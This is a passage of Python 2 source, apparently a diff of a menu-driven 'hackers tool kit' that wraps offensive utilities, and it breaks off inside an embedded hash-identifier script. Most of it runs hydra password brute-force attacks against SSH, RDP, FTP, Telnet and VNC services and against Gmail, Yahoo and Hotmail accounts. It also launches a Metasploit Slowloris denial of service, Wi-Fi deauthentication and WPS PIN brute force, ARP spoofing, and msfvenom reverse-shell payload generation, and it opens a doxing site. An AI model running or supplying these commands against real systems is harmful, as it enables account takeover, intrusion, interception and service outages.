Cisco Brute Force |" + print " +---------------------------+" + print + print + iphost = raw_input("[*] IP/Hostname : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -P %s %s cisco" % (word, iphost)) + sys.exit() + + elif bhydra == '02' or bhydra == '2': + print + print " +---------------------------+" + print " | VNC Brute Force |" + print " +---------------------------+" + print + print + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -P %s -e n -t 1 %s vnc -V" % (word, iphost)) + iphost = raw_input("[*] IP/Hostname : ") + + elif bhydra == '03' or bhydra == '3': + print + print " +------------------------------+" + print " | FTP Brute Force |" + print " +------------------------------+" + print + print + user = raw_input("[*] User : ") + iphost = raw_input("[*] IP/Hostname : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s %s ftp" % (user, word, iphost)) + sys.exit() + + elif bhydra == '04' or bhydra == '4': + print + print " +------------------------------+" + print " | Gmail Brute Force |" + print " +------------------------------+" + print + print + email = raw_input("[*] Email : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s -s 465 smtp.gmail.com smtp" % (email, word)) + sys.exit() + + elif bhydra == '05' or bhydra == '5': + print + print " +--------------------------------+" + print " | SSH Brute Force |" + print " +--------------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -l %s -P %s %s ssh" % (user, word, iphost)) + sys.exit() + + elif bhydra == '06' or bhydra == '6': + print + print " +-------------------------+" + print " | TeamSpeak Brute Force |" + print " +-------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -l %s -P %s -s 8676 %s teamspeak" % (user, word, iphost)) + sys.exit() + + elif bhydra == '07' or bhydra == '7': + print + print " +-------------------------+" + print " | Telnet Brute Force |" + print " +-------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -l %s -P %s %s telnet" % (user, word, iphost)) + sys.exit() + + elif bhydra == '08' or bhydra == '8': + print + print " +---------------------------+" + print " | Yahoo Brute Force |" + print " +---------------------------+" + print + print + email = raw_input("[*] Email : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s -s 587 smtp.mail.yahoo.com smtp" % (email, word)) + sys.exit() + + elif bhydra == '09' or bhydra == '9': + print + print " +----------------------------+" + print " | Hotmail Brute Force |" + print " +----------------------------+" + print + print + email = raw_input("[*] Email : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s -s 587 smtp.live.com smtp" % (email, word)) + sys.exit() + + elif bhydra == '10': + print + print " +-----------------------------+" + print " | Router Speedy Brute Force |" + print " +-----------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -m / -l %s -P %s %s http-get" % (user, word, iphost)) + sys.exit() + + elif bhydra == '11': + print + print " +----------------------------+" + print " | RDP Brute Force |" + print " +----------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -t 1 -V -f -l %s -P %s %s rdp" % (user, word, iphost)) + sys.exit() + + elif bhydra == '12': + print + print " +-----------------------------+" + print " | MySQL Brute Force |" + print " +-----------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -t 5 -V -f -l %s -e ns -P %s localhost mysql" % (user, word)) + + elif bhydra == '00' or bhydra == '0': + print "\n[!] Exit the Program..." + sys.exit() + + else: + print "\n[!] ERROR : Wrong Input" + time.sleep(1) + restart_program() +#-------------------# +#HYDRA AUTOMATED END# + + +#WORDLIST MAKER START# +#--------------------# +def cupp(): + os.system("cd /root/hackers-tool-kit/wordlists && cupp -i") + print Y+"wordlist saved to /root/hackers-tool-kit/wordlists\033[0m" +#------------------# +#WORDLIST MAKER END# + + +#LIST FILES START# +#----------------# +def vdir(): + print "\n" + os.system("ls") + print Y+"! doesnt have to be these can be any directory !\033[0m" + print "\n" + h = raw_input("Directory Path: ") + print "\n" + print "--------------------------------------------------------------------------------------------------------------------------------------------" + os.system("ls " + h) + print "--------------------------------------------------------------------------------------------------------------------------------------------" +#--------------# +#LIST FILES END# + + +#MONITOR MODE OFF START# +#----------------------# +def monoff(): + os.system("iwconfig") + i = raw_input("Select Interface: ") + os.system("airmon-ng stop " + i) +#--------------------# +#MONITOR MODE OFF END# + + +#TURN ON VPN START# +#-----------------# +def vpn(): + os.system("anonsurf start") + os.system("anonsurf myip") +#---------------# +#TURN ON VPN END# + + +#TURN OFF VPN START# +#------------------# +def vpnoff(): + os.system("anonsurf stop") + os.system("anonsurf myip") +#----------------# +#TURN OFF VPN END# + + +#SLOW LORIS DOS START# +#--------------------# +def slowl(): + de = raw_input("Delay: ") + tar = raw_input("RHOST: ") + port = raw_input("RPORT: ") + soc = raw_input("Sockets: ") + os.system('echo "use auxiliary/dos/http/slowloris\n" > slowl.rc') + os.system('echo "set delay {0}\n" >> slowl.rc'.format(de)) + os.system('echo "set RHOST {0}\n" >> slowl.rc'.format(tar)) + os.system('echo "set RPORT {0}\n" >> slowl.rc'.format(port)) + os.system('echo "set sockets {0}\n" >> slowl.rc'.format(soc)) + os.system('echo "run\n" >> slowl.rc') + os.system('msfconsole -r slowl.rc') + os.system('rm -rf slowl.rc') +#------------------# +#SLOW LORIS DOS END# + + +#OPEN DOX WEBSITE START# +#----------------------# +def pidox(): + print Y+"! USING FIREFOX !\033[0m" + os.system("sleep 2") + os.system("firefox https://pipl.com/") +#--------------------# +#OPEN DOX WEBSITE END# + + +#SCAN SPECIFIC NET START# +#-----------------------# +def specnet(): + jk = raw_input("BSSID: ") + kj = raw_input("ESSID: ") + os.system("iwconfig") + k = raw_input("INTERFACE: ") + print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" + j = raw_input("[y/n]> ") + if j == "y": + a = 'airodump-ng -w /root/SCAN --bssid {0} --essid {1} {2}'.format(jk,kj,k) + os.system(a) + if j == "n": + a = 'airodump-ng --bssid {0} --essid {1} {2}'.format(jk,kj,k) + os.system(a) +#---------------------# +#SCAN SPECIFIC NET END# + + +#DEFAULT WIFI PIN START# +#----------------------# +def pingen(): + j = raw_input("Enter BSSID: ") + a = 'cd /root/hackers-tool-kit/tools && python pingen.py {0}'.format(j) + os.system(a) +#--------------------# +#DEFAULT WIFI PIN END# + + +#WIFI PIN BRUTEFORCE START# +#-------------------------# +def reaver(): + os.system("iwconfig") + j = raw_input("Select Interface: ") + k = raw_input("Enter BSSID: ") + a = 'reaver -i {0} -b {1} -vv'.format(j,k) + os.system(a) +#-----------------------# +#WIFI PIN BRUTEFORCE END# + + +#DEAUTH ATTACK START# +#-------------------# +def deauth(): + print Y+"! YOU MAY HAVE TO CHANGE YOUR WIFI CHANNEL !\033[0m" + j = raw_input("Enter BSSID> ") + os.system("iwconfig") + k = raw_input("Enter Interface> ") + a = 'aireplay-ng -0 0 -a {0} {1}'.format(j,k) + os.system(a) +#-----------------# +#DEAUTH ATTACK END# + + +#MAC CHANGER START# +#-----------------# +def macc(): + os.system("iwconfig") + k = raw_input("Interface: ") + c = 'ifconfig {0} down'.format(k) + os.system(c) + os.system("macchanger -r " + k) + s = 'ifconfig {0} up'.format(k) + os.system(s) +#-----------------# +#MAC CHANGER START# + + +#MAC CHANGER OFF START# +#---------------------# +def macoff(): + os.system("iwconfig") + k = raw_input("Interface: ") + c = 'ifconfig {0} down'.format(k) + os.system(c) + os.system("macchanger -p " + k) + s = 'ifconfig {0} up'.format(k) + os.system(s) +#-------------------# +#MAC CHANGER OFF END# + + +#ARP SPOOF START# +#---------------# +def arpspoof(): + print "\033[93mif using multiple targets heres an example: 134.143.1.3, 134.143.1.6\033[0m\n" + h = raw_input("Targets: ") + os.system('echo "net.sniff on\n" >> arp.cap') + os.system('echo "set arp.spoof.targets {0}\n" >> arp.cap'.format(h)) + os.system('echo "arp.spoof on\n" >> arp.cap') + print '\n\033[93mto stop type "exit"\033[0m' + os.system("sleep 2") + os.system("bettercap -no-history -caplet arp.cap") + os.system("rm arp.cap") +#-------------# +#ARP SPOOF END# + + +#SSL SCAN START# +#--------------# +def sslscan(): + j = raw_input('Enter Target: ') + a = 'sslscan {0}'.format(j) + os.system(a) +#------------# +#SSL SCAN END# + + +#MAKE A PAYLOAD START# +#--------------------# +def payload(): + os.system("cat /root/hackers-tool-kit/tools/payloads.txt") + print "\n" + f = raw_input("Select Payload: ") + l = raw_input("LHOST: ") + c = raw_input("LPORT: ") + print "\nExamples: py, php, exe\n" + s = raw_input("File Format: ") + h = raw_input("File Name: ") + a = 'msfvenom -p {0} LHOST={1} LPORT={2} -o /root/{3}.{4}'.format(f,l,c,h,s) + os.system(a) +#------------------# +#MAKE A PAYLOAD END# + + +#WORDLIST MAKER START# +#--------------------# +def crunch(): + print "minimal number of characters" + j = raw_input("[CRUNCH]: ") + print "maximum number of characters" + k = raw_input("[CRUNCH]: ") + print "what characters should be in it" + b = raw_input("[CRUNCH]: ") + print "name of file" + s = raw_input("[CRUNCH]: ") + a = 'crunch {0} {1} {2} -o /root/hackers-tool-kit/wordlists/{3}'.format(j,k,b,s) + os.system(a) + print Y+"wordlist saved to \033[0m/root/hackers-tool-kit/wordlists/" + s +#------------------# +#WORDLIST MAKER END# + + +#INTERNET TRAFFIC START# +#----------------------# +def traff(): + os.system("iwconfig") + s = raw_input("Select Interface: ") + os.system("tcpdump -i " + s) +#--------------------# +#INTERNET TRAFFIC END# + + +#RESET ACCOUNT PASSWORD START# +#----------------------------# +def resa(): + j = raw_input("USERNAME: ") + k = raw_input("NEW PASSWORD: ") + print "are you sure?" + q = raw_input("[y/n]: ") + if q == "n": + os.system("clear") + mainbanner() + if q == "y": + a = 'echo "{0}:{1}" | chpasswd'.format(j,k) + print "password for {0} has been reset".format(j) +#--------------------------# +#RESET ACCOUNT PASSWORD END# + + +#RESET UNIX PASSWORD START# +#-------------------------# +def resu(): + j = raw_input("PASSWORD: ") + print "are you sure?" + q = raw_input("[y/n]: ") + if q == "n": + os.system("clear") + mainbanner() + if q == "y": + a = 'passwd {0}'.format(j) + print "unix password has been reset".format(j) +#-----------------------# +#RESET UNIX PASSWORD END# + + +#FIND HASH TYPE START# +#--------------------# +def hashid(): + #!/usr/bin/python + # encoding: utf-8 + # Hash Identifier v1.1 + # By Zion3R + # www.Blackploit.com + # Root@Blackploit.com + + logo=''' ######################################################################### + # __ __ __ ______ _____ # + # /\ \/\ \ /\ \ /\__ _\ /\ _ `\ # + # \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ # + # \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ # + # \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ # + # \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ # + # \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.1 # + # By Zion3R # + # www.Blackploit.com # + # Root@Blackploit.com # + #########################################################################''' + + algorithms={"102020":"ADLER-32", "102040":"CRC-32", "102060":"CRC-32B", "101020":"CRC-16", "101040":"CRC-16-CCITT", "104020":"DES(Unix)", "101060":"FCS-16", "103040":"GHash-32-3", "103020":"GHash-32-5", "115060":"GOST R 34.11-94", "109100":"Haval-160", "109200":"Haval-160(HMAC)", "110040":"Haval-192", "110080":"Haval-192(HMAC)", "114040":"Haval-224", "114080":"Haval-224(HMAC)", "115040":"Haval-256", "115140":"Haval-256(HMAC)", "107080":"Lineage II C4", "106025":"Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))", "102080":"XOR-32", "105060":"MD5(Half)", "105040":"MD5(Middle)", "105020":"MySQL", "107040":"MD5(phpBB3)", "107060":"MD5(Unix)", "107020":"MD5(Wordpress)", "108020":"MD5(APR)", "106160":"Haval-128", "106165":"Haval-128(HMAC)", "106060":"MD2", "106120":"MD2(HMAC)", "106040":"MD4", "106100":"MD4(HMAC)", "106020":"MD5", "106080":"MD5(HMAC)", "106140":"MD5(HMAC(Wordpress))", "106029":"NTLM", "106027":"RAdmin v2.x", "106180":"RipeMD-128", "106185":"RipeMD-128(HMAC)", "106200":"SNEFRU-128", "106205":"SNEFRU-128(HMAC)", "106220":"Tiger-128", "106225":"Tiger-128(HMAC)", "106240":"md5($pass.$salt)", "106260":"md5($salt.'-'.md5($pass))", "106280":"md5($salt.$pass)", "106300":"md5($salt.$pass.$salt)", "106320":"md5($salt.$pass.$username)", "106340":"md5($salt.md5($pass))", "106360":"md5($salt.md5($pass).$salt)", "106380":"md5($salt.md5($pass.$salt))", "106400":"md5($salt.md5($salt.$pass))", "106420":"md5($salt.md5(md5($pass).$salt))", "106440":"md5($username.0.$pass)", "106460":"md5($username.LF.$pass)", "106480":"md5($username.md5($pass).$salt)", "106500":"md5(md5($pass))", "106520":"md5(md5($pass).$salt)", "106540":"md5(md5($pass).md5($salt))", "106560":"md5(md5($salt).$pass)", "106580":"md5(md5($salt).md5($pass))", "106600":"md5(md5($username.$pass).$salt)", "106620":"md5(md5(md5($pass)))", "106640":"md5(md5(md5(md5($pass))))", "106660":"md5(md5(md5(md5(md5($pass)))))", "106680":"md5(sha1($pass))", "106700":"md5(sha1(md5($pass)))", "106720":"md5(sha1(md5(sha1($pass))))", "106740":"md5(strtoupper(md5($pass)))", "109040":"MySQL5 - SHA-1(SHA-1($pass))", "109060":"MySQL 160bit - SHA-1(SHA-1($pass))", "109180":"RipeMD-160(HMAC)", "109120":"RipeMD-160", "109020":"SHA-1", "109140":"SHA-1(HMAC)", "109220":"SHA-1(MaNGOS)", "109240":"SHA-1(MaNGOS2)", "109080":"Tiger-160", "109160":"Tiger-160(HMAC)", "109260":"sha1($pass.$salt)", "109280":"sha1($salt.$pass)", "109300":"sha1($salt.md5($pass))", "109320":"sha1($salt.md5($pass).$salt)", "109340":"sha1($salt.sha1($pass))", "109360":"sha1($salt.sha1($salt.sha1($pass)))", "109380":"sha1($username.$pass)", "109400":"sha1($username.$pass.$salt)", "1094202":"sha1(md5($pass))", "109440":"sha1(md5($pass).$salt)", "109460":"sha1(md5(sha1($pass)))", "109480":"sha1(sha1($pass))", "109500":"sha1(sha1($pass).$salt)", "109520":"sha1(sha1($pass).substr($pass,0,3))", "109540":"sha1(sha1($salt.$pass))", "109560":"sha1(sha1(sha1($pass)))", "109580":"sha1(strtolower($username).$pass)", "110020":"Tiger-192", "110060":"Tiger-192(HMAC)", "112020":"md5($pass.$salt) - Joomla", "113020":"SHA-1(Django)", "114020":"SHA-224", "114060":"SHA-224(HMAC)", "115080":"RipeMD-256", "115160":"RipeMD-256(HMAC)", "115100":"SNEFRU-256", "115180":"SNEFRU-256(HMAC)", "115200":"SHA-256(md5($pass))", "115220":"SHA-256(sha1($pass))", "115020":"SHA-256", "115120":"SHA-256(HMAC)", "116020":"md5($pass.$salt) - Joomla", "116040":"SAM - (LM_hash:NT_hash)", "117020":"SHA-256(Django)", "118020":"RipeMD-320", "118040":"RipeMD-320(HMAC)", "119020":"SHA-384", "119040":"SHA-384(HMAC)", "120020":"SHA-256", "121020":"SHA-384(Django)", "122020":"SHA-512", "122060":"SHA-512(HMAC)", "122040":"Whirlpool", "122080":"Whirlpool(HMAC)"} + + # hash.islower() minusculas + # hash.isdigit() numerico + # hash.isalpha() letras + # hash.isalnum() alfanumerico + + def CRC16(): + hs='4607' + if len(hash)==len(hs) and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("101020") + def CRC16CCITT(): + hs='3d08' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("101040") + def FCS16(): + hs='0e5b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("101060") + + def CRC32(): + hs='b33fd057' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102040") + def ADLER32(): + hs='0607cb42' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102020") + def CRC32B(): + hs='b764a0d9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102060") + def XOR32(): + hs='0000003f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102080") + + def GHash323(): + hs='80000000' + if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("103040") + def GHash325(): + hs='85318985' + if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("103020") + + def DESUnix(): + hs='ZiY8YtDKXJwYQ' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False: + jerar.append("104020") + + def MD5Half(): + hs='ae11fd697ec92c7c' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("105060") + def MD5Middle(): + hs='7ec92c7c98de3fac' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("105040") + def MySQL(): + hs='63cea4673fd25f46' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("105020") + + def DomainCachedCredentials(): + hs='f42005ec1afe77967cbc83dce1b4d714' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106025") + def Haval128(): + hs='d6e3ec49aa0f138a619f27609022df10' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106160") + def Haval128HMAC(): + hs='3ce8b0ffd75bc240fc7d967729cd6637' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106165") + def MD2(): + hs='08bbef4754d98806c373f2cd7d9a43c4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106060") + def MD2HMAC(): + hs='4b61b72ead2b0eb0fa3b8a56556a6dca' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106120") + def MD4(): + hs='a2acde400e61410e79dacbdfc3413151' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106040") + def MD4HMAC(): + hs='6be20b66f2211fe937294c1c95d1cd4f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106100") + def MD5(): + hs='ae11fd697ec92c7c98de3fac23aba525' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106020") + def MD5HMAC(): + hs='d57e43d2c7e397bf788f66541d6fdef9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106080") + def MD5HMACWordpress(): + hs='3f47886719268dfa83468630948228f6' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106140") + def NTLM(): + hs='cc348bace876ea440a28ddaeb9fd3550' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106029") + def RAdminv2x(): + hs='baea31c728cbf0cd548476aa687add4b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106027") + def RipeMD128(): + hs='4985351cd74aff0abc5a75a0c8a54115' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106180") + def RipeMD128HMAC(): + hs='ae1995b931cf4cbcf1ac6fbf1a83d1d3' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106185") + def SNEFRU128(): + hs='4fb58702b617ac4f7ca87ec77b93da8a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106200") + def SNEFRU128HMAC(): + hs='59b2b9dcc7a9a7d089cecf1b83520350' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106205") + def Tiger128(): + hs='c086184486ec6388ff81ec9f23528727' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106220") + def Tiger128HMAC(): + hs='c87032009e7c4b2ea27eb6f99723454b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106225") + def md5passsalt(): + hs='5634cc3b922578434d6e9342ff5913f7' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106240") + def md5saltmd5pass(): + hs='245c5763b95ba42d4b02d44bbcd916f1' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106260") + def md5saltpass(): + hs='22cc5ce1a1ef747cd3fa06106c148dfa' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106280") + def md5saltpasssalt(): + hs='469e9cdcaff745460595a7a386c4db0c' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106300") + def md5saltpassusername(): + hs='9ae20f88189f6e3a62711608ddb6f5fd' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106320") + def md5saltmd5pass(): + hs='aca2a052962b2564027ee62933d2382f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106340") + def md5saltmd5passsalt(): + hs='de0237dc03a8efdf6552fbe7788b2fdd' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106360") + def md5saltmd5passsalt(): + hs='5b8b12ca69d3e7b2a3e2308e7bef3e6f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106380") + def md5saltmd5saltpass(): + hs='d8f3b3f004d387086aae24326b575b23' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106400") + def md5saltmd5md5passsalt(): + hs='81f181454e23319779b03d74d062b1a2' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106420") + def md5username0pass(): + hs='e44a60f8f2106492ae16581c91edb3ba' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106440") + def md5usernameLFpass(): + hs='654741780db415732eaee12b1b909119' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106460") + def md5usernamemd5passsalt(): + hs='954ac5505fd1843bbb97d1b2cda0b98f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106480") + def md5md5pass(): + hs='a96103d267d024583d5565436e52dfb3' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106500") + def md5md5passsalt(): + hs='5848c73c2482d3c2c7b6af134ed8dd89' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106520") + def md5md5passmd5salt(): + hs='8dc71ef37197b2edba02d48c30217b32' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106540") + def md5md5saltpass(): + hs='9032fabd905e273b9ceb1e124631bd67' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106560") + def md5md5saltmd5pass(): + hs='8966f37dbb4aca377a71a9d3d09cd1ac' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106580") + def md5md5usernamepasssalt(): + hs='4319a3befce729b34c3105dbc29d0c40' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106600") + def md5md5md5pass(): + hs='ea086739755920e732d0f4d8c1b6ad8d' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106620") + def md5md5md5md5pass(): + hs='02528c1f2ed8ac7d83fe76f3cf1c133f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106640") + def md5md5md5md5md5pass(): + hs='4548d2c062933dff53928fd4ae427fc0' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106660") + def md5sha1pass(): + hs='cb4ebaaedfd536d965c452d9569a6b1e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106680") + def md5sha1md5pass(): + hs='099b8a59795e07c334a696a10c0ebce0' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106700") + def md5sha1md5sha1pass(): + hs='06e4af76833da7cc138d90602ef80070' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106720") + def md5strtouppermd5pass(): + hs='519de146f1a658ab5e5e2aa9b7d2eec8' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106740") + + def LineageIIC4(): + hs='0x49a57f66bd3d5ba6abda5579c264a0e4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True and hash[0:2].find('0x')==0: + jerar.append("107080") + def MD5phpBB3(): + hs='$H$9kyOtE8CDqMJ44yfn9PFz2E.L2oVzL1' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$H$')==0: + jerar.append("107040") + def MD5Unix(): + hs='$1$cTuJH0Ju$1J8rI.mJReeMvpKUZbSlY/' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$1$')==0: + jerar.append("107060") + def MD5Wordpress(): + hs='$P$BiTOhOj3ukMgCci2juN0HRbCdDRqeh.' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$P$')==0: + jerar.append("107020") + + def MD5APR(): + hs='$apr1$qAUKoKlG$3LuCncByN76eLxZAh/Ldr1' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash[0:4].find('$apr')==0: + jerar.append("108020") + + def Haval160(): + hs='a106e921284dd69dad06192a4411ec32fce83dbb' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109100") + def Haval160HMAC(): + hs='29206f83edc1d6c3f680ff11276ec20642881243' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109200") + def MySQL5(): + hs='9bb2fb57063821c762cc009f7584ddae9da431ff' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109040") + def MySQL160bit(): + hs='*2470c0c06dee42fd1618bb99005adca2ec9d1e19' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:1].find('*')==0: + jerar.append("109060") + def RipeMD160(): + hs='dc65552812c66997ea7320ddfb51f5625d74721b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109120") + def RipeMD160HMAC(): + hs='ca28af47653b4f21e96c1235984cb50229331359' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109180") + def SHA1(): + hs='4a1d4dbc1e193ec3ab2e9213876ceb8f4db72333' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109020") + def SHA1HMAC(): + hs='6f5daac3fee96ba1382a09b1ba326ca73dccf9e7' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109140") + def SHA1MaNGOS(): + hs='a2c0cdb6d1ebd1b9f85c6e25e0f8732e88f02f96' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109220") + def SHA1MaNGOS2(): + hs='644a29679136e09d0bd99dfd9e8c5be84108b5fd' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109240") + def Tiger160(): + hs='c086184486ec6388ff81ec9f235287270429b225' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109080") + def Tiger160HMAC(): + hs='6603161719da5e56e1866e4f61f79496334e6a10' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109160") + def sha1passsalt(): + hs='f006a1863663c21c541c8d600355abfeeaadb5e4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109260") + def sha1saltpass(): + 